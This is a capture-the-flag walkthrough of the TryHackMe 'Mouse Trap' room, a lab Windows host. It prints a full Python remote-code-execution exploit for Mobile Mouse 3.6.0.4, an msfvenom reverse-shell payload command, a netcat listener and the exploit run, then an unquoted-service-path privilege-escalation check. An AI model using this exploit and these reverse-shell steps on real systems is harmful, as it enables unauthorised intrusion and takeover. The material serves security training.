Success!

# Try Hack Me/Mouse Trap #### **Try Hack Me / [Mouse Trap](https://tryhackme.com/room/mousetrap "Mouse Trap")** by: alfreddgreat [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2024-11/scaled-1680-/CDUIQl90ZROwA44L-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2024-11/CDUIQl90ZROwA44L-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/GQMkC4n9GGpXBQtn-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/GQMkC4n9GGpXBQtn-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/fZHB8tYYaXo1txla-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/fZHB8tYYaXo1txla-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/wmssfjxQvU5NXsBQ-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/wmssfjxQvU5NXsBQ-image.png)

root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0

```shell root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0 Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST Nmap scan report for 10.10.162.0 Host is up (0.00035s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: MOUSETRAP | NetBIOS_Domain_Name: MOUSETRAP | NetBIOS_Computer_Name: MOUSETRAP | DNS_Domain_Name: MOUSETRAP | DNS_Computer_Name: MOUSETRAP | Product_Version: 10.0.17763 |_ System_Time: 2025-03-30T21:22:42+00:00 | ssl-cert: Subject: commonName=MOUSETRAP | Not valid before: 2024-12-08T13:53:36 |_Not valid after: 2025-06-09T13:53:36 |_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time. 9099/tcp open unknown | fingerprint-strings: | FourOhFourRequest, GetRequest: | HTTP/1.0 200 OK | Server: Mobile Mouse Server | Content-Type: text/html | Content-Length: 326 |_ Success!

The server running on "MOUSETRAP" was able to receive your request.

9999/tcp open abyss? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9099-TCP:V=7.80%I=7%D=3/30%Time=67E9B591%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\ SF:x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x203 SF:26\r\n\r\nSuccess!

The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x SF:20receive\x20your\x20request\.

\r\n")%r(FourOhFourRequ SF:est,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Se SF:rver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20326\r\ SF:n\r\nSuccess!

The\ SF:x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x20rec SF:eive\x20your\x20request\.

\r\n"); MAC Address: 02:23:36:E3:FF:87 (Unknown) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=3/30%OT=135%CT=1%CU=37501%PV=Y%DS=1%DC=D%G=Y%M=022336% OS:TM=67E9B63F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%CI=I%II= OS:I%SS=S%TS=U)OPS(O1=M5B4NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%O5= OS:M5B4NW8NNS%O6=M5B4NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF7 OS:0)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y% OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0% OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=80%CD=Z) Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: , NetBIOS MAC: 02:23:36:e3:ff:87 (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2025-03-30T21:22:42 |_ start_date: N/A OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds ```

root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0

```shell root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0 Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST Nmap scan report for 10.10.162.0 Host is up (0.00025s latency). Not shown: 994 closed ports PORT STATE SERVICE 135/tcp open msrpc |_clamav-exec: ERROR: Script execution failed (use -d to debug) 139/tcp open netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) 3389/tcp open ms-wbt-server |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: 9099/tcp open unknown |_clamav-exec: ERROR: Script execution failed (use -d to debug) 9999/tcp open abyss |_clamav-exec: ERROR: Script execution failed (use -d to debug) MAC Address: 02:23:36:E3:FF:87 (Unknown) Host script results: |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds ```

Using port 9099 in the browser

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/DAt6BwYBHH2k9y4A-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/DAt6BwYBHH2k9y4A-image.png)

In the first port, version scan we see that there is a Mobile Mouse Server

Search for an exploit in the internet and the following from github appears

https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/vSlfbK1wRHhUCuNO-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/vSlfbK1wRHhUCuNO-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/hgZcjrTPWFEIje5y-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/hgZcjrTPWFEIje5y-image.png)

Using the V2 version: [CVE-2023-31902-v2.py](https://github.com/blue0x1/mobilemouse-exploit/blob/main/CVE-2023-31902-v2.py "CVE-2023-31902-v2.py")

```python # Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2 # Date: Apr 28, 2023 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse import threading from impacket import smbserver def smb_server(lhost, file_to_serve): server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) server.addShare("share", ".", "") server.start() help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload", required=True) parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256) s.connect((host, port)) smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell)) smb_server_thread.start() CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8') hex_payload = payload.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print("Take The rose...") sleep(30) s.close() ```

Save the file to a **mousemobile.py** using the code above

Now create an executable remote shell execution using the **msfvenom**.

msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

**msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=IP\_LOCAL\_MACHINE LPORT=PORT\_LOCAL -f exe > shell-x64.exe**

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/K11cy9Ka8BoVAAJ4-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/K11cy9Ka8BoVAAJ4-image.png)

Using the **mousemobile.py** and using the **shell-x64.exe** as the code to be executed.

Take note that shell-x64.exe has been created using port 446

First open a terminal and run the following command

**nc -lnvp 446**

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/zXJkgOxjWAAtrfvY-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/zXJkgOxjWAAtrfvY-image.png)

Leave it open and open another terminal and now we will exploit the mouse application using the python script.

**python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe**

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/QHG4kY8IdiABAEJr-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/QHG4kY8IdiABAEJr-image.png)

Now with the first terminal where netcat is opened, it should have connected.

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/G197xR3YtSvfW0Zj-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/G197xR3YtSvfW0Zj-image.png)

Now we have a windows terminal opened.

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/npZD24LWuXGNJ9TI-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/npZD24LWuXGNJ9TI-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/liNjbiC8Zkac3lhE-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/liNjbiC8Zkac3lhE-image.png)

Get the flag in the user.txt

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/tH4Tr7vM1vt3BSVT-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/tH4Tr7vM1vt3BSVT-image.png)

**THM{Terry\_mouse\_2\_rce}**

#### Exploiting the Unquoted Path Search the unquoted path of a service using the command below.

Using shapup.exe

``` C:\Users\purpletom>SharpUp.exe audit SharpUp.exe audit === SharpUp: Running Privilege Escalation Checks === [!] Modifialbe scheduled tasks were not evaluated due to permissions. === Services with Unquoted Paths === Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable. Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable. Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable. ``` 'C:\\Program Files (x86)\\Mobile Mouse\\Mouse' is modifable.